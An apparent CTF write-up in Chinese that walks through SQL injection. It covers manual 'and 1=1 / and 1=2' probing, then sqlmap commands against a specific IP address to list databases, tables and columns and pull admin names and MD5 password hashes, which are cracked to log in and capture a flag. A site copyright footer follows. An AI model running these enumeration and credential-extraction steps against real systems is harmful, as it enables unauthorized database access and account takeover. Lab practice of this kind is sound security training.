sqlmap注入图文详解

1.发现此网址可能存在sql注入漏洞，我们进行sql盲注入测试一下是否存在漏洞。

地址栏输入and 1=1发现页面正常显示。

再次输入and 1=2页面出现错误，说明该页面可能存在sql注入漏洞

2.现在拿出我们的kali工具，sqlmap进行注入测试。

sqlmap -u http://219.153.49.228:49634/new_list.php?id=1 --dbs

3.可以看到存在注入漏洞，扫到了5个数据库。要获取管理员用户密码，我们可以先从stormgroup注入。查看stormgroup这个数据库存在的表单

sqlmap -u http://219.153.49.228:49634/new_list.php?id=1 -D stormgroup -tables

4.接下来查一下member中存在哪些列。

sqlmap -u http://219.153.49.228:49634/new_list.php?id=1 -D stormgroup -T member --columns

5.上一步可以看到，name,password 是不是很熟悉。ok接下来我们开始获取这两列的数据。

6.可以看到password是经过md5加密，接下来我们把他解密。这里推荐给大家我自己收集的多种解密网址：解密网址大全点击这里

7.now! 密码已经呈现在我们眼前！！！！找到后台地址进行登录。

8.END 登录成功，拿到flag，提交。Gameover ！

总结

本篇文章就到这里了，希望能给你带来帮助，也希望您能够多多关注本站的更多内容！

海外服务器租用

版权声明：本站文章来源标注为YINGSOO的内容版权均为本站所有，欢迎引用、转载，请保持原文完整并注明来源及原文链接。禁止复制或仿造本网站，禁止在非www.yingsoo.com所属的服务器上建立镜像，否则将依法追究法律责任。本站部分内容来源于网友推荐、互联网收集整理而来，仅供学习参考，不代表本站立场，如有内容涉嫌侵权，请联系alex-e#qq.com处理。